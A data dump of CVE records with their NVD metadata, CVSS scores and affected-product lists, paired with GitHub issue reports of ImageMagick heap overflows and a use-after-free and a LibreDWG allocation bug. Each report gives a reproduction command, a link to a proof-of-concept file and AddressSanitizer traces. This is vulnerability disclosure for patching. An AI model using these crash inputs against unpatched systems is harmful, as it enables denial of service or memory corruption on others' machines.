"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1562
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [X] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in function WriteSGIImage of coders/sgi.c. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=1s1qxnLgAWnDOLL582hni6LgrvCnPddI0) magick convert $poc ./test.sgi `=================================================================` `==41720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f70c67db7f8 at pc 0x0000006c216f bp 0x7ffea64ddb50 sp 0x7ffea64ddb40` `WRITE of size 1 at 0x7f70c67db7f8 thread T0` ` #0 0x6c216e in WriteSGIImage coders/sgi.c:1051` ` #1 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #2 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #3 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #4 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #5 0x4100a1 in MagickMain utilities/magick.c:149` ` #6 0x410282 in main utilities/magick.c:180` ` #7 0x7f70c10c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #8 0x40fbb8 in _start (/home/test/temp/ImageMagick/utilities/magick+0x40fbb8)` `0x7f70c67db7f8 is located 8 bytes to the left of 524288-byte region [0x7f70c67db800,0x7f70c685b800)` `allocated by thread T0 here:` ` #0 0x7f70c5868076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)` ` #1 0x4408c7 in AcquireAlignedMemory MagickCore/memory.c:265` ` #2 0x440beb in AcquireVirtualMemory MagickCore/memory.c:621` ` #3 0x6c1ead in WriteSGIImage coders/sgi.c:1030` ` #4 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #5 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #6 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #7 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #8 0x4100a1 in MagickMain utilities/magick.c:149` ` #9 0x410282 in main utilities/magick.c:180` ` #10 0x7f70c10c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` `SUMMARY: AddressSanitizer: heap-buffer-overflow coders/sgi.c:1051 WriteSGIImage` `Shadow bytes around the buggy address:` ` 0x0fee98cf36a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa` ` 0x0fee98cf36b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa` ` 0x0fee98cf36c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa` ` 0x0fee98cf36d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa` ` 0x0fee98cf36e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa` `=>0x0fee98cf36f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]` ` 0x0fee98cf3700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x0fee98cf3710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x0fee98cf3720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x0fee98cf3730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x0fee98cf3740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==41720==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: `Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-29 https://imagemagick.org` `Copyright: ? 1999-2019 ImageMagick Studio LLC` `License: https://imagemagick.org/script/license.php` `Features: Cipher DPC HDRI OpenMP(4.0) ` `Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib` - Environment (Operating system, version and so on): `Distributor ID: Ubuntu` `Description: Ubuntu 16.04.1 LTS` `Release: 16.04` `Codename: xenial` - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in WriteSGIImage of coders/sgi.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1562/comments
2
2019-04-29T03:08:25Z
2020-02-07T01:34:56Z
https://github.com/ImageMagick/ImageMagick/issues/1562
438,134,907
1,562
CVE-2019-19949
2019-12-24T01:15:11.327
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WritePNGImage of coders/png.c, related to Magick_png_write_raw_profile and LocaleNCompare.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00006.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1561" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4549-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "78819D62-25B5-4F9E-8291-2C1FD9803531", "versionEndExcluding": "6.9.10-43", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "6.9.9-33", "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "9C915428-2EBC-492C-89C5-55F84DECDEDB", "versionEndExcluding": "7.0.8-43", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.7-23", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1561
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in function WritePNGImage of png.c. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=11dbKOgAj3s8BPTO4P4Xescp2-2HlQUBP) magick convert $poc ./test.png `=================================================================` `==41625==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b251 at pc 0x7f57acd61145 bp 0x7fff0c9e88f0 sp 0x7fff0c9e8098` `READ of size 1 at 0x60200000b251 thread T0` ` #0 0x7f57acd61144 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x4b144)` ` #1 0x435b4e in LocaleNCompare MagickCore/locale.c:1581` ` #2 0x76bab9 in Magick_png_write_raw_profile coders/png.c:8183` ` #3 0x77be6c in WriteOnePNGImage coders/png.c:11083` ` #4 0x783ffa in WritePNGImage coders/png.c:12744` ` #5 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #6 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #7 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #8 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #9 0x4100a1 in MagickMain utilities/magick.c:149` ` #10 0x410282 in main utilities/magick.c:180` ` #11 0x7f57a860f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #12 0x40fbb8 in _start (/home/ImageMagick/utilities/magick+0x40fbb8)` `` `0x60200000b251 is located 0 bytes to the right of 1-byte region [0x60200000b250,0x60200000b251)` `allocated by thread T0 here:` ` #0 0x7f57acdae602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)` ` #1 0x44096a in AcquireMagickMemory MagickCore/memory.c:478` ` #2 0x4409be in AcquireQuantumMemory MagickCore/memory.c:551` ` #3 0x4c4165 in ConstantString MagickCore/string.c:713` ` #4 0x49a6fb in CloneSplayTree MagickCore/splay-tree.c:372` ` #5 0x487eab in CloneImageProfiles MagickCore/profile.c:190` ` #6 0x418926 in CloneImage MagickCore/image.c:838` ` #7 0x76d056 in WriteOnePNGImage coders/png.c:8528` ` #8 0x783ffa in WritePNGImage coders/png.c:12744` ` #9 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #10 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #11 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #12 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #13 0x4100a1 in MagickMain utilities/magick.c:149` ` #14 0x410282 in main utilities/magick.c:180` ` #15 0x7f57a860f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` `` `SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??` `Shadow bytes around the buggy address:` ` 0x0c047fff95f0: fa fa 07 fa fa fa 00 01 fa fa 00 fa fa fa 04 fa` ` 0x0c047fff9600: fa fa 00 03 fa fa 00 fa fa fa 00 02 fa fa 06 fa` ` 0x0c047fff9610: fa fa 00 05 fa fa 05 fa fa fa 00 fa fa fa 01 fa` ` 0x0c047fff9620: fa fa 00 02 fa fa 00 04 fa fa 00 04 fa fa 00 04` ` 0x0c047fff9630: fa fa 03 fa fa fa 00 02 fa fa 07 fa fa fa 07 fa` `=>0x0c047fff9640: fa fa 00 01 fa fa 04 fa fa fa[01]fa fa fa 00 04` ` 0x0c047fff9650: fa fa 04 fa fa fa 04 fa fa fa 00 02 fa fa 06 fa` ` 0x0c047fff9660: fa fa 04 fa fa fa 00 02 fa fa 06 fa fa fa 04 fa` ` 0x0c047fff9670: fa fa 00 02 fa fa 06 fa fa fa 04 fa fa fa 00 02` ` 0x0c047fff9680: fa fa 06 fa fa fa 04 fa fa fa 00 02 fa fa 00 03` ` 0x0c047fff9690: fa fa 06 fa fa fa 04 fa fa fa 00 02 fa fa 05 fa` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==41625==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: `Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-29 https://imagemagick.org` `Copyright: ? 1999-2019 ImageMagick Studio LLC` `License: https://imagemagick.org/script/license.php` `Features: Cipher DPC HDRI OpenMP(4.0) ` `Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib` - Environment (Operating system, version and so on): `Distributor ID: Ubuntu` `Description: Ubuntu 16.04.1 LTS` `Release: 16.04` `Codename: xenial` - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in WritePNGImage of png.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1561/comments
3
2019-04-29T02:55:44Z
2019-12-26T12:39:58Z
https://github.com/ImageMagick/ImageMagick/issues/1561
438,133,289
1,561
CVE-2019-19952
2019-12-24T01:15:11.527
In ImageMagick 7.0.9-7 Q16, there is a use-after-free in the function MngInfoDiscardObject of coders/png.c, related to ReadOneMNGImage.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1791" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "857D548F-3DED-4D35-B2AD-4003378032DA", "versionEndExcluding": "7.0.9-7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.8-61", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1791
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [X] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap-use-after-free vulnerability in function MngInfoDiscardObject of coders/png.c whick can be reproduced as below. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=1z31pFLCb5tluwW_n_l7Dh9C_YWBs_IvX) magick convert $poc /dev/null `=================================================================` `==21864==ERROR: AddressSanitizer: heap-use-after-free on address 0xf0a2c1ad at pc 0x083e0eb3 bp 0xffafc948 sp 0xffafc938` `READ of size 1 at 0xf0a2c1ad thread T0` ` #0 0x83e0eb2 in MngInfoDiscardObject coders/png.c:1569` ` #1 0x83e1237 in MngInfoFreeStruct coders/png.c:1609` ` #2 0x84021f5 in ReadMNGImage coders/png.c:7790` ` #3 0x84fccbf in ReadImage MagickCore/constitute.c:553` ` #4 0x810a116 in ReadStream MagickCore/stream.c:1043` ` #5 0x84fbcd1 in PingImage MagickCore/constitute.c:273` ` #6 0x84fc2e3 in PingImages MagickCore/constitute.c:374` ` #7 0x8991f79 in IdentifyImageCommand MagickWand/identify.c:304` ` #8 0x8a26ba8 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #9 0x8053b31 in MagickMain utilities/magick.c:149` ` #10 0x8053d72 in main utilities/magick.c:180` ` #11 0xf60c5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)` ` #12 0x80535a0 (/home/ImageMagick/utilities/magick+0x80535a0)` `0xf0a2c1ad is located 8365 bytes inside of 12368-byte region [0xf0a2a100,0xf0a2d150)` `freed by thread T0 here:` ` #0 0xf7241a84 in free (/usr/lib/i386-linux-gnu/libasan.so.2+0x96a84)` ` #1 0x808a8e4 in RelinquishMagickMemory MagickCore/memory.c:1089` ` #2 0x83e12de in MngInfoFreeStruct coders/png.c:1614` ` #3 0x8401702 in ReadOneMNGImage coders/png.c:7681` ` #4 0x84021e4 in ReadMNGImage coders/png.c:7789` ` #5 0x84fccbf in ReadImage MagickCore/constitute.c:553` ` #6 0x810a116 in ReadStream MagickCore/stream.c:1043` ` #7 0x84fbcd1 in PingImage MagickCore/constitute.c:273` ` #8 0x84fc2e3 in PingImages MagickCore/constitute.c:374` ` #9 0x8991f79 in IdentifyImageCommand MagickWand/identify.c:304` ` #10 0x8a26ba8 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #11 0x8053b31 in MagickMain utilities/magick.c:149` ` #12 0x8053d72 in main utilities/magick.c:180` ` #13 0xf60c5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)` `previously allocated by thread T0 here:` ` #0 0xf7241dee in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96dee)` ` #1 0x80899a2 in AcquireMagickMemory MagickCore/memory.c:488` ` #2 0x8402117 in ReadMNGImage coders/png.c:7780` ` #3 0x84fccbf in ReadImage MagickCore/constitute.c:553` ` #4 0x810a116 in ReadStream MagickCore/stream.c:1043` ` #5 0x84fbcd1 in PingImage MagickCore/constitute.c:273` ` #6 0x84fc2e3 in PingImages MagickCore/constitute.c:374` ` #7 0x8991f79 in IdentifyImageCommand MagickWand/identify.c:304` ` #8 0x8a26ba8 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #9 0x8053b31 in MagickMain utilities/magick.c:149` ` #10 0x8053d72 in main utilities/magick.c:180` ` #11 0xf60c5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)` `SUMMARY: AddressSanitizer: heap-use-after-free coders/png.c:1569 MngInfoDiscardObject` `Shadow bytes around the buggy address:` ` 0x3e1457e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e1457f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145800: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` `=>0x3e145830: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd` ` 0x3e145840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145870: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` ` 0x3e145880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==21864==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.9-7 Q16 x86_64 2019-11-27 https://imagemagick.org Copyright: ? 1999-2020 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.0) Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.5 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-use-after-free in MngInfoDiscardObject of coders/png.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1791/comments
8
2019-11-27T06:48:11Z
2020-03-08T20:06:50Z
https://github.com/ImageMagick/ImageMagick/issues/1791
529,151,827
1,791
CVE-2019-20009
2019-12-27T01:15:13.257
An issue was discovered in GNU LibreDWG before 0.93. Crafted input will lead to an attempted excessive memory allocation in dwg_decode_SPLINE_private in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/compare/0.9.2...0.9.3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issue-541977765" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "09B5D2C4-D4B2-4226-AA34-A346E6064FA2", "versionEndExcluding": "0.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 